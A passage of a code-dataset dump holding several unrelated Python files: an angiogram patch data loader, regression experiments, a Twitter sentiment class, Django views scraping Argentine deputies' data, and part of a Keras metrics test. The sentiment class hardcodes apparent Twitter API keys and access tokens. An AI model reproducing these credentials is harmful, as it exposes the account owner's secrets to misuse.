neighborhood_active_row_indices = np.meshgrid(neighborhood_active_col_indices, neighborhood_active_row_indices)\n neighborhood_active_col_indices = neighborhood_active_col_indices.reshape(neighborhood_active_col_indices.size) + offset\n neighborhood_active_row_indices = neighborhood_active_row_indices.reshape(neighborhood_active_row_indices.size) + offset\n\n patch_neighborhood = np.zeros([patch_size + neightbor_offset*2, patch_size + neightbor_offset*2, n_scales]) \n patch_neighborhood[neighborhood_active_row_indices, neighborhood_active_col_indices, :] = img_temp[active_col_indices, active_row_indices, :]\n\n return patch_neighborhood\n\n\n\ndef load_image(filename):\n img = cv2.imread(filename)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n return img\n\n\n\ndef extract_patches(img, patch_size, stride, sample_percentaje, randomize_sample = True, sample_indices = [], normalize_data = False, class_extraction_type = 'max'):\n try:\n n_scales, height, width = img.shape\n img_temp = img.copy()\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[np.newaxis, :, :]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n if (sample_percentaje > 1):\n sample_size = sample_percentaje\n\n else:\n sample_size = np.max([int(np.floor(sample_percentaje * n_patches_in_height * n_patches_in_width)), 1])\n \n if len(sample_indices) == 0:\n sample_indices = np.arange(n_patches_in_height * n_patches_in_width)\n\n if (randomize_sample):\n np.random.shuffle(sample_indices)\n \n if normalize_data:\n observations_data = extractnormalizedpatches(img_temp, patch_size, stride, sample_indices[0:sample_size])\n observations_classes = []\n\n else:\n if class_extraction_type == 'max':\n observations_data, observations_classes = extractpatchesMax(img_temp, patch_size, stride, sample_indices[0:sample_size])\n else:\n observations_data, observations_classes = extractpatchesCenter(img_temp, patch_size, stride, sample_indices[0:sample_size])\n \n return observations_data, sample_indices[0:sample_size], observations_classes\n\n\n\ndef extract_balanced_patches(img, positive_class_percentaje, patch_size, stride, sample_percentaje, randomize_sample = True, sample_indices = [], class_extraction_type = 'max'):\n try:\n n_scales, height, width = img.shape\n img_temp = img.copy()\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[np.newaxis, :, :]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n if (sample_percentaje > 1):\n sample_size = sample_percentaje\n\n else:\n sample_size = np.max([int(np.floor(sample_percentaje * n_patches_in_height * n_patches_in_width)), 1])\n \n if len(sample_indices) == 0:\n sample_indices = np.arange(n_patches_in_height * n_patches_in_width)\n\n if (randomize_sample):\n np.random.shuffle(sample_indices)\n\n if class_extraction_type == 'center':\n balanced_sample, balanced_sample_indices, balanced_classes = extractbalancedpatchesCenter(img_temp, patch_size, stride, positive_class_percentaje, sample_indices[0:sample_size])\n\n else:\n balanced_sample, balanced_sample_indices, balanced_classes = extractbalancedpatchesMax(img_temp, patch_size, stride, positive_class_percentaje, sample_indices[0:sample_size])\n \n\n return balanced_sample, balanced_sample_indices, balanced_classes\n\n\ndef get_dataset(directory, initial_index, final_index, patch_size = 0, stride = 0, sample_percentaje = 0.01, class_extraction_type = 'max', randomize_sample = True, balance_dataset = -1.0, normalize_dataset = False, show_time = False):\n starting_time = perf_counter()\n\n img = load_image(directory + str(initial_index) + '.png') / 255;\n img_gt = load_image(directory + str(initial_index) + '_gt.png') / 127.5 - 1.0\n\n height, width = img.shape\n n_images_in_dataset = final_index - initial_index + 1\n \n img_cat = np.zeros([height, width * n_images_in_dataset])\n img_gt_cat = np.zeros([height, width * n_images_in_dataset])\n \n img_cat[:, 0:width] = img\n img_gt_cat[:, 0:width] = img_gt\n\n for current_image_index in range(1, n_images_in_dataset):\n filename = directory + str(current_image_index + initial_index) + '.png'\n #print('Loading image: \"{}\"'.format(filename))\n filtered_img = load_image(filename) / 255.0\n filename = directory + str(current_image_index + initial_index) + '_gt.png'\n img_gt = load_image(filename)/127.5 - 1.0\n\n img_cat[:, (current_image_index * width):((current_image_index + 1) * width)] = filtered_img\n img_gt_cat[:, (current_image_index * width):((current_image_index + 1) * width)] = img_gt\n\n if balance_dataset > 0.0:\n dataset_gt, sampled_indices, dataset_classes = extract_balanced_patches(img_gt_cat, balance_dataset, patch_size, stride, sample_percentaje, randomize_sample, [], class_extraction_type)\n\n else:\n dataset_gt, sampled_indices, dataset_classes = extract_patches(img_gt_cat, patch_size, stride, sample_percentaje, randomize_sample, [], False, class_extraction_type)\n \n dataset_observations, _, _ = extract_patches(img_cat, patch_size, stride, 1.0, False, sampled_indices, normalize_dataset)\n elapsed_time = perf_counter() - starting_time\n\n if show_time:\n print('Dataset shape = {}, extracted in {} seconds.'.format(dataset_observations.shape, elapsed_time))\n \n return dataset_classes.reshape([dataset_classes.size, 1]), dataset_observations, dataset_gt\n\n\n\nif (__name__ == \"__main__\"):\n print('Test data loader for coronary angiograms.')\n\n patch_size = 3\n stride = 1\n \n height = 10\n width = 10\n\n img_test = np.arange(100, dtype = np.float64).reshape([1, 10, 10])\n img_gt = img_test.copy()\n img_gt[img_gt < 50] = -1\n img_gt[img_gt >= 50] = 1 \n\n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n sampled_indices = np.arange(n_patches_in_height * n_patches_in_width, dtype = np.int)\n\n balanced_sample_gt, balanced_sample_indices = extractbalancedpatches(img_gt, 3, 1, 0.3, sampled_indices)\n\n print(balanced_sample_gt.shape)\n\n plt.figure()\n for sample_idx, sample in enumerate(balanced_sample_gt):\n row_idx = int(sample_idx / 5)\n col_idx = int(sample_idx % 5)\n plt.subplot(8, 5, sample_idx+1)\n plt.imshow(sample[0])\n \n print(balanced_sample_indices)\n balanced_sample, max_values = extractpatches(img_test[np.newaxis, :, :], 3, 1, balanced_sample_indices)\n\n print(balanced_sample[0])\n\n plt.figure()\n for sample_idx, sample in enumerate(balanced_sample):\n row_idx = int(sample_idx / 5)\n col_idx = int(sample_idx % 5)\n plt.subplot(8, 5, sample_idx+1)\n plt.imshow(sample[0])\n \n plt.show()","sub_path":"support_vector_machine_python/cnn_tests/src/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562042985","text":"from pandas import read_csv\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.svm import SVR\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import explained_variance_score\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import Ridge\n\n\n\"\"\"\nPlotting a different model with one feature component.\nTraining a different regression models using sklearn.\n\"\"\"\n\n\n\n\n# load the data set from CSV file\ndataset = read_csv('C://Users/Ahmed/Desktop/backup/MyProject/ML-EXP/Regresstion/dataset_1.csv', header=None)\n# replace missing data with zeros.\ndataset.fillna(0, inplace=True)\n\n\n# extracting feature ID 21, change the features you want to use to fit the model here:\n# features = dataset[[2,,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]]\n\nfeatures = dataset[[21]]\n\n# target value\ntargets = dataset[23]\n\n\n\n\"\"\" Plotting simple feautre with the regression model\"\"\"\n# training set\ntraining_X = features.values\ntraining_Y = targets.values\n\n\n# Regression models\nclf = GradientBoostingRegressor()\nr = linear_model.LinearRegression()\nridge = Ridge(alpha=1.0)\nsvr_rbf = SVR(kernel='rbf', C=1e3, gamma=0.1, verbose=True)\n\ny_rbf = ridge.fit(training_X, training_Y).predict(training_X)\n\nlw = 2\nplt.scatter(training_X, training_Y, color='red', label='data')\nplt.plot(training_X, y_rbf, color='blue', lw=lw, label='Ridge Model')\nplt.xlabel('data')\nplt.ylabel('target')\nplt.title('Ridge Model')\nplt.legend()\nplt.show()\n\n\n\nparams = {'n_estimators': 500, 'max_depth': 4, 'min_samples_split': 2,'learning_rate': 0.01, 'loss': 'ls', 'verbose': 1}\nclf = GradientBoostingRegressor(**params)\nr = linear_model.LinearRegression()\nridge = Ridge(alpha=1.0)\n\n\n\n# test the model with 10 fold cross validation\npredicted = cross_val_predict(svr_rbf,training_X,training_Y, cv=10)\n\n\n\n# report the results using diff evaluation scores\nprint(\"Mean absolute error \",mean_absolute_error(training_Y, predicted))\nprint(\"explained_variance_score \",explained_variance_score(training_Y, predicted))\nprint(\"Mean Squared Error\",mean_squared_error(training_Y, predicted))\nprint(\"R2\",r2_score(training_Y, predicted))\n\n\n\n\"\"\"\nall 10 folds cross-validation\n\nModel Explained variance score Mean absolute error Mean squared error R² score, the coefficient of determination\n\n--------Simple Linear Regression \nMean absolute error 0.07042462538734469\nexplained_variance_score 0.0004416111465148642\nMean Squared Error 0.02868278898950552\nR2 0.0004416110718995503\n\n----------SVR Rbf \nexplained_variance_score -0.0007286527751753091\nMean Squared Error 0.030256845295889515\nR2 -0.054412231288652135\n\nexplained_variance_score -0.0006681239841130893\nMean Squared Error 0.030258686679529447\nR2 -0.05447640114553742\n\n----------Gradient Boosting regression\nMean absolute error 0.07058640152386743\nexplained_variance_score -0.002300711123233379\nMean Squared Error 0.028761481551683146\nR2 -0.002300723737301613\n\n-----------Ridge Regression\nMean absolute error 0.07042462385867472\nexplained_variance_score 0.00044161228873362823\nMean Squared Error 0.0286827889567291\nR2 0.0004416122141157608\n\n\n\"\"\"\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"267037984","text":"import tweepy,random,time,sys\nfrom textblob import TextBlob\nclass sentiment:\n def __init__(self):\n global api\n consumer_key = '2sHw7Vi6MeMCiE4cIChSkzJiU'\n consumer_secret = 'zwmHQfIkyrDDV2f50RMZey8DnhxLxXDQuCrFQDi4WWdECIUEUI'\n access_token = '1157382902793015297-OKerCHHnHxBmReCSDXDGktphYdCd0g'\n access_token_secret = 'zwrdalxvhHGzUea08ne9LjVmVRasww98WFrRGkgy3pUDX'\n def OAuth():\n try:\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n return auth\n except Exception as e:\n return None\n oauth = OAuth()\n api=tweepy.API(oauth)\n def search(self,searchterm):\n global api\n max_tweets=10000\n word=searchterm\n public_tweets=api.search(word, count=max_tweets)\n polarityscore=0\n subjectivityscore=0\n tweetcount=0\n for tweet in public_tweets:\n try:\n analysis = TextBlob(tweet.text)\n subjectivityscore += analysis.subjectivity\n polarityscore += analysis.polarity\n tweetcount += 1\n except:\n pass\n avr_pol=polarityscore/tweetcount\n avr_subj=subjectivityscore/tweetcount\n return avr_pol, avr_subj\n","sub_path":"StockTradingBot/twitter_sentiment.py","file_name":"twitter_sentiment.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"339367860","text":"# -*- coding: utf-8 -*-\r\n#Python modules\r\nimport os\r\nimport re\r\nimport csv\r\n#Django functions\r\nfrom django.shortcuts import render\r\nfrom django.http import JsonResponse\r\n#Django models\r\nfrom models import Asistencias\r\n#Json serializers\r\nfrom django.core import serializers\r\nimport json\r\n#Dependencies\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom unidecode import unidecode\r\n\r\napp_path = os.path.dirname(os.path.realpath(__file__))\r\n\r\ndef MainApi(request):\r\n\t#Cantidad de sesiones\r\n\tcantidad_sesiones = 10\r\n\tperiodo = 134\r\n\tslug_sesiones = 'Se realizaron 9 Sesiones que comprenden 9 reuniones (incluye 1 Sesión Informativa) + 1 Asamblea Legislativa. TOTAL: 10'\r\n\r\n\tsesiones = list()\r\n\twith open(app_path+'/static/tabula-PRESENTISMO_2016_0816.csv', 'rb') as f:\r\n\t\treader = csv.reader(f)\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\tsesiones.append({'fecha':row[0], 'sesion':row[1], 'presente':row[2], 'ausente':row[3], 'licencia':row[4], 'mo':row[5]})\r\n\r\n\treturn JsonResponse({'periodo':periodo, 'cantidad_sesiones':cantidad_sesiones,'slug_sesiones':slug_sesiones,'sesiones':sesiones})\r\n\r\n\r\ndef DiputadosApi(request):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/listadip.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tdata = soup.find('table',{'id':'tablesorter'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tdiputados = []\r\n\r\n\tfor diputado in data:\r\n\t\tdatos = diputado.findAll('td')\r\n\t\timg = datos[0].img.attrs['src']\r\n\t\tif datos[1].find('a'):\r\n\t\t\turl_diputado = datos[1].a.attrs['href']\r\n\t\t\tnombre = datos[1].a.get_text().strip()\r\n\t\telse:\r\n\t\t\tnombre = datos[1].get_text().strip()\r\n\t\t\turl_diputado = ''\r\n\t\tid_diputado = url_diputado.split('/')[2]\r\n\t\tdistrito = datos[2].get_text().strip()\r\n\t\tini_mandato = datos[3].get_text().strip()\r\n\t\tfin_mandato = datos[4].get_text().strip()\r\n\t\tbloque = datos[5].get_text().strip()\r\n\r\n\t\t# Correcciones para matchear \"bloque\" diputados con \"bloque\" asistencias\r\n\t\tif bloque == 'UCR':\r\n\t\t\tbloque = 'UNION CIVICA RADICAL'\r\n\t\telif bloque == 'PROYECTO SUR - UNEN':\r\n\t\t\tbloque = 'PROYECTO SUR'\r\n\t\telif bloque == 'BRIGADIER GENERAL JUAN BAUTISTA BUSTOS':\r\n\t\t\tbloque = 'BG JUAN B. BUSTOS'\r\n\t\telif bloque == 'FRENTE CIVICO Y SOCIAL DE CATAMARCA':\r\n\t\t\tbloque = 'FTE. CIVICO Y SOCIAL DE CATAMARCA'\r\n\t\telif bloque == 'DEMOCRATA PROGRESISTA':\r\n\t\t\tbloque = 'PARTIDO DEMOCRATA PROGRESISTA'\r\n\t\telif bloque == 'MOV POP NEUQUINO':\r\n\t\t\tbloque = 'MOVIMIENTO POPULAR NEUQUINO'\r\n\t\telif bloque == 'LIBERTAD VALORES Y CAMBIO':\r\n\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\t\telif bloque == 'FRENTE DE IZQUIERDA Y DE LOS TRABAJADORES':\r\n\t\t\tbloque = 'FTE. DE IZQUIERDA Y DE LOS TRABAJADORES'\r\n\t\t# Correccion para matchear \"nombre\" diputados con \"nombre\" asistencias\r\n\t\tif nombre == 'SOSA, SOLEDAD':\r\n\t\t\tnombre = 'SOSA CAPURRO, VICTORIA SOLEDAD'\r\n\r\n\t\ttmp_dict = {'id':id_diputado,'nombre':nombre.upper(),'bloque':bloque.upper(),'distrito':distrito,'ini':ini_mandato,'fin':fin_mandato,'img':img,'url':url_diputado}\r\n\t\tdiputados.append(tmp_dict)\r\n\r\n\treturn JsonResponse(diputados, safe=False)\r\n\r\n\r\ndef DiputadoApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+id)\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('div', {'class':'detalleDip container appInvisible'})\r\n\r\n\timg = info.find('div',{'class':'verticalPad'}).find('img',{'class':'img-circle'}).attrs['src']\r\n\tcargo = info.h2.get_text().strip()\r\n\tnombre = info.h1.get_text().strip()\r\n\tbloque = info.find('div',{'class':'col-sm-12 col-md-4'}).contents[4].strip()\r\n\temail = info.find('a').get_text().strip()\r\n\ttel = info.findAll('div', {'class':'col-sm-12 col-md-2 verticalPad'})[1].contents[4].replace(u'Teléfono:','').strip()\r\n\tdistrito_escudo = info.find('div', {'class':'col-sm-12 col-md-2 distrito'}).img.attrs['src'].strip()\r\n\tdistrito = info.find('div', {'class':'col-sm-12 col-md-2 distrito'}).div.get_text().strip()\r\n\r\n\tdiputado = {'id':id,'nombre':nombre,'bloque':bloque,'distrito':distrito,'cargo':cargo,'email':email,'tel':tel,'img':img,'distrito_escudo':distrito_escudo}\r\n\r\n\treturn JsonResponse(diputado, safe=False)\r\n\r\n\r\ndef DiputadoProyectosApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+id+'/listadodeproy.html?size=1000')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('table', {'id':'tabla-proyectos'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tproyectos = []\r\n\r\n\tfor proyecto in info:\r\n\t\tdatos = proyecto.findAll('td')\r\n\t\texpediente_url = datos[0].a.attrs['href']\r\n\t\tid_proyecto = re.search('id=([0-9]+)', datos[0].a.attrs['href']).group(1)\r\n\t\texpediente = datos[0].a.get_text()\r\n\t\ttipo = datos[1].get_text()\r\n\t\tsumario = datos[2].get_text()\r\n\t\tfecha = datos[3].get_text()\r\n\r\n\t\ttmp_dict = {'expediente':expediente,'fecha':fecha,'tipo':tipo,'sumario':sumario,'expediente_url':expediente_url,'id_proyecto':id_proyecto,'id':id}\r\n\t\tproyectos.append(tmp_dict)\r\n\r\n\treturn JsonResponse(proyectos, safe=False)\r\n\r\n\r\ndef ProyectoApi(request, id):\r\n\r\n\thtml = requests.get('http://www.diputados.gov.ar/proyectos/proyecto.jsp?id='+id)\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tcontent = soup.find('div', {'id':'proyecto-tab'}).find('div',{'class':'tab-content'})\r\n\r\n\ttexto = content.find('div',{'id':'texto'}).get_text()\r\n\r\n\tfundamentos = unidecode(content.find('div',{'id':'fundamentos'}).get_text())\r\n\r\n\tdata_firmantes = content.find('div',{'id':'firmantes'}).find('table').findAll('tr')\r\n\tfirmantes = []\r\n\tfor firmante in data_firmantes[1:]:\r\n\t\tdatos = firmante.findAll('td')\r\n\t\tnombre = datos[0].get_text()\r\n\t\tdistrito = datos[1].get_text()\r\n\t\tbloque = datos[2].get_text()\r\n\t\tfirmantes.append({'firmante':nombre,'distrito':distrito,'bloque':bloque})\r\n\r\n\tcomision = []\r\n\tdata_tramite = soup.find('div', {'id':'tramites'}).find('table')\r\n\ttitulo_tramite = data_tramite.caption.get_text().strip()\r\n\tfor t in data_tramite.findAll('tr')[1:]:\r\n\t\tdatos = t.findAll('td')\r\n\t\tcomision.append(datos[0].get_text())\r\n\r\n\tproyecto = {'id':id,'texto':texto,'fundamentos':fundamentos,'firmantes':firmantes,'tramite':{'titulo':titulo_tramite,'comisiones':comision}}\r\n\r\n\treturn JsonResponse(proyecto, safe=False)\r\n\r\n\r\ndef DiputadoComisionesApi(request, id):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/'+ id +'/comisiones.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tinfo = soup.find('table', {'id':'tablaComisiones'}).findAll('tr')[1:]\r\n\r\n\tcomisiones = []\r\n\r\n\tfor c in info:\r\n\t\tdatos = c.findAll('td')\r\n\t\tcomision = datos[0].a.get_text()\r\n\t\tcargo = datos[1].get_text().strip()\r\n\t\tcomisiones.append({'comision':comision,'cargo':cargo})\r\n\r\n\treturn JsonResponse({'id':id,'comisiones':comisiones}, safe=False)\r\n\r\n\r\ndef AsistenciasApi(request):\r\n\thtml = requests.get('http://www.diputados.gov.ar/diputados/listadip.html')\r\n\tsoup = BeautifulSoup(html.text, 'html5lib')\r\n\tdata = soup.find('table',{'id':'tablesorter'}).findAll('tr')[1:]\r\n\r\n\ttmp_dict = {}\r\n\tdiputados = []\r\n\r\n\tfor diputado in data:\r\n\t\tdatos = diputado.findAll('td')\r\n\t\tif datos[1].find('a'):\r\n\t\t\turl_diputado = datos[1].a.attrs['href']\r\n\t\t\tnombre = datos[1].a.get_text()\r\n\t\telse:\r\n\t\t\tnombre = datos[1].get_text()\r\n\t\t\turl_diputado = ''\r\n\t\tid_diputado = url_diputado.split('/')[2]\r\n\t\tbloque = datos[5].get_text()\r\n\r\n\t\t# Correcciones para matchear \"bloque\" diputados con \"bloque\" asistencias\r\n\t\tif bloque == 'UCR':\r\n\t\t\tbloque = 'UNION CIVICA RADICAL'\r\n\t\telif bloque == 'PROYECTO SUR - UNEN':\r\n\t\t\tbloque = 'PROYECTO SUR'\r\n\t\telif bloque == 'BRIGADIER GENERAL JUAN BAUTISTA BUSTOS':\r\n\t\t\tbloque = 'BG JUAN B. BUSTOS'\r\n\t\telif bloque == 'FRENTE CIVICO Y SOCIAL DE CATAMARCA':\r\n\t\t\tbloque = 'FTE. CIVICO Y SOCIAL DE CATAMARCA'\r\n\t\telif bloque == 'DEMOCRATA PROGRESISTA':\r\n\t\t\tbloque = 'PARTIDO DEMOCRATA PROGRESISTA'\r\n\t\telif bloque == 'MOV POP NEUQUINO':\r\n\t\t\tbloque = 'MOVIMIENTO POPULAR NEUQUINO'\r\n\t\telif bloque == 'LIBERTAD VALORES Y CAMBIO':\r\n\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\t\telif bloque == 'FRENTE DE IZQUIERDA Y DE LOS TRABAJADORES':\r\n\t\t\tbloque = 'FTE. DE IZQUIERDA Y DE LOS TRABAJADORES'\r\n\r\n\r\n\t\tif nombre.find(' ',nombre.find(', ')+2) == -1:\r\n\t\t\tnuevo_nombre = nombre.upper()\r\n\t\telse:\r\n\t\t\tnuevo_nombre = nombre[:nombre.find(' ',nombre.find(', ')+2)].upper()\r\n\r\n\t\t#print 'DP: '+nuevo_nombre\r\n\r\n\t\tasistencia = Asistencias.objects.filter(nombre_match=nuevo_nombre, bloque=bloque)\r\n\t\tif asistencia:\r\n\t\t\tfor obj in asistencia:\r\n\t\t\t\tpresente = obj.presente\r\n\t\t\t\tausente = obj.ausente\r\n\t\t\t\tlicencia = obj.licencia\r\n\t\t\t\tmo = obj.mo\r\n\t\t\t\t#print 'AS: '+obj.nombre_match\r\n\t\telse:\r\n\t\t\tpresente = None\r\n\t\t\tausente = None\r\n\t\t\tlicencia = None\r\n\t\t\tmo = None\r\n\r\n\t\ttmp_dict = {'id':id_diputado,'nombre':nombre.upper(),'bloque':bloque.upper(),'presente':presente,'ausente':ausente,'licencia':licencia,'mo':mo}\r\n\t\tdiputados.append(tmp_dict)\r\n\r\n\treturn JsonResponse(diputados, safe=False)\r\n\r\n\r\ndef AsistenciasUpdate(request):\r\n\r\n\tdef make_int(num):\r\n\t\tif num == '':\r\n\t\t\treturn 0\r\n\t\telse:\r\n\t\t\treturn int(num)\r\n\r\n\r\n\tasistencias = []\r\n\r\n\twith open(app_path+'/static/tabula-ESTADISTICAS_2016_0816.csv', 'rb') as f:\r\n\t\treader = csv.reader(f)\r\n\t\t#Pasa al segundo registro porque el primero contiene los nombres de columnas\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\t# Unidecode toma los caracteres Unicode y devuelve su equivalente en ASCII, ej = 'á' devuelve 'a'\r\n\t\t\t# ord() devuelve el numero de caracter Unicode | Á=193 É=201 Í=205 Ó=211 Ú=218 Ì=204\r\n\t\t\tbloque = ''.join(unidecode(c) if ord(c)==193 or ord(c)==201 or ord(c)==205 or ord(c)==211 or ord(c)==218 or ord(c)==204 else c for c in row[0].decode('utf8').upper() or ord(c)==218).replace('\\r', ' ')\r\n\t\t\tnombre = ''.join(unidecode(c) if ord(c)==193 or ord(c)==201 or ord(c)==205 or ord(c)==211 or ord(c)==218 or ord(c)==204 else c for c in row[1].decode('utf8').upper()).split('\\r')\r\n\t\t\t\r\n\t\t\tobservacion = ''\r\n\t\t\tif len(nombre) > 1:\r\n\t\t\t\tfor e in nombre[1:]:\r\n\t\t\t\t\tobservacion += ' ' + e\r\n\t\t\t\tobservacion = observacion.replace('OBSERVACION: ','').strip()\r\n\r\n\t\t\tnombre = nombre[0].strip().replace('-',' ')\r\n\r\n\t\t\t# En el PDF de Asistencias figuran como bloque \"Frente para la Victoria - PJ\"\r\n\t\t\t# Pero en el sitio de diputados son parte del \"Frente de la Concordia Misionero\"\r\n\t\t\tif nombre == 'CLOSS, MAURICE FABIAN' or nombre == 'FRANCO, JORGE DANIEL' or nombre == 'RISKO, SILVIA LUCRECIA':\r\n\t\t\t\tbloque = 'FRENTE DE LA CONCORDIA MISIONERO'\r\n\t\t\t# En el PDF de Asistencias figura como \"Frente para la Victoria - PJ\"\r\n\t\t\telif nombre == 'CARLOTTO, REMO GERARDO' or nombre == 'DE PONTI, LUCILA MARIA' or nombre == 'FERREYRA, ARACELI SUSANA DEL ROSARIO' or nombre == 'GROSSO, LEONARDO' or nombre == 'GUZMAN, ANDRES ERNESTO' or nombre == 'HORNE, SILVIA RENEE':\r\n\t\t\t\tbloque = 'PERONISMO PARA LA VICTORIA'\r\n\t\t\t# En el sitio de Diputados el bloque figura con la palabra CAMBIO en su nombre, en vez de CAMBIOS\r\n\t\t\telif bloque == 'LIBERTAD, VALORES Y CAMBIOS':\r\n\t\t\t\tbloque = 'LIBERTAD, VALORES Y CAMBIO'\r\n\r\n\t\t\t#nombre_match\r\n\t\t\tif nombre.find(' ',nombre.find(', ')+2) == -1:\r\n\t\t\t\tnuevo_nombre = nombre\r\n\t\t\telse:\r\n\t\t\t\tnuevo_nombre = nombre[:nombre.find(' ',nombre.find(', ')+2)]\r\n\r\n\t\t\tupdated_values = {'nombre':nombre,'bloque':bloque,'nombre_match':nuevo_nombre,'presente':make_int(row[3].decode('utf8')),'ausente':make_int(row[4].decode('utf8')),'licencia':make_int(row[5].decode('utf8')),'mo':make_int(row[6].decode('utf8')),'observacion':observacion}\r\n\t\t\tobj, created = Asistencias.objects.update_or_create(nombre=nombre, bloque=bloque, defaults=updated_values)\r\n\t\t\tasistencias.append({'objeto':serializers.serialize('json',[obj,]),'creado':created})\r\n\r\n\treturn JsonResponse(asistencias, safe=False)\r\n\r\n##########################\r\n\r\n\r\n##########################\r\n\r\ndef Index(request):\r\n\treturn render(request, 'index.html')\r\n\r\ndef Presentismo(request):\r\n\t#asistencias\r\n response = requests.get('https://diputadosarg.herokuapp.com/asistencias/')\r\n data_asistencias = json.loads(response.text)\r\n #gral\r\n response = requests.get('https://diputadosarg.herokuapp.com/main/')\r\n data_gral = json.loads(response.text)\r\n\r\n sesiones = data_gral['cantidad_sesiones']\r\n\r\n estadistica = {}\r\n for diputado in data_asistencias:\r\n if estadistica.get(diputado['bloque']) == None:\r\n estadistica[diputado['bloque']] = {}\r\n estadistica[diputado['bloque']]['presente'] = diputado['presente']\r\n estadistica[diputado['bloque']]['ausente'] = diputado['ausente']\r\n estadistica[diputado['bloque']]['licencia'] = diputado['licencia']\r\n estadistica[diputado['bloque']]['mo'] = diputado['mo']\r\n estadistica[diputado['bloque']]['bancas'] = 1\r\n else:\r\n estadistica[diputado['bloque']]['presente'] = estadistica.get(diputado['bloque']).get('presente', 0) + diputado['presente']\r\n estadistica[diputado['bloque']]['ausente'] = estadistica.get(diputado['bloque']).get('ausente', 0) + diputado['ausente']\r\n estadistica[diputado['bloque']]['licencia'] = estadistica.get(diputado['bloque']).get('licencia', 0) + diputado['licencia']\r\n estadistica[diputado['bloque']]['mo'] = estadistica.get(diputado['bloque']).get('mo', 0) + diputado['mo']\r\n estadistica[diputado['bloque']]['bancas'] = estadistica.get(diputado['bloque']).get('bancas', 0) + 1\r\n\r\n for bloque, values in estadistica.iteritems():\r\n \testadistica[bloque]['presentismo'] = round(float(values['presente']) / float(values['bancas']) * float(sesiones), 2)\r\n\r\n return render(request, 'presentismo.html', {'estadistica':estadistica, 'data_gral':data_gral})","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219284492","text":"import keras\nimport keras.backend\nfrom .. import keras_metrics\nimport itertools\nimport numpy\nimport unittest\nimport os.path\n\n\ndef ref_true_pos(y_true, y_pred):\n return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 1, y_true == 1))\n\n\ndef ref_false_pos(y_true, y_pred):\n return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 1, y_true == 0))\n\n\ndef ref_true_neg(y_true, y_pred):\n return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 0, y_true == 0))\n\n\ndef ref_false_neg(y_true, y_pred):\n return numpy.sum(numpy.logical_and(numpy.round(y_pred) == 0, y_true == 1))\n\nclass TestMetrics(unittest.TestCase):\n\n def test_metrics(self):\n # numpy.random.seed(2334) # Fix seed\n\n tp = keras_metrics.true_positive()\n tn = keras_metrics.true_negative()\n fp = keras_metrics.false_positive()\n fn = keras_metrics.false_negative()\n\n precision = keras_metrics.precision()\n recall = keras_metrics.recall()\n f1 = keras_metrics.f1_score()\n\n model_fn = \"./temp_model.hdf5\"\n model = keras.models.Sequential()\n # model.add(keras.layers.Input((1,)))\n model.add(keras.layers.Activation(keras.backend.sin, input_shape=(1,)))\n model.add(keras.layers.Activation(keras.backend.abs))\n\n model.compile(optimizer=\"sgd\",\n loss=\"binary_crossentropy\",\n metrics=[tp, tn, fp, fn, precision, recall, f1])\n\n samples = 10000\n batch_size = 100\n lim = numpy.pi/2\n\n numpy.random.seed(2333) # Fix seed\n x = numpy.random.uniform(0, lim, (samples, 1))\n y = numpy.random.randint(2, size=(samples, 1))\n\n if os.path.isfile(model_fn):\n print(\"Load saved model weights from %s\" % model_fn)\n model.load_weights(model_fn)\n else:\n model.fit(x, y, epochs=10, batch_size=batch_size)\n model.save_weights(model_fn, overwrite=False)\n print(\"Svae model weights to %s\" % model_fn)\n\n print(\"Evaluate model...\")\n metrics = model.evaluate(x, y, batch_size=batch_size)[1:]\n y_pred = model.predict(x)\n\n metrics = list(map(float, metrics))\n\n 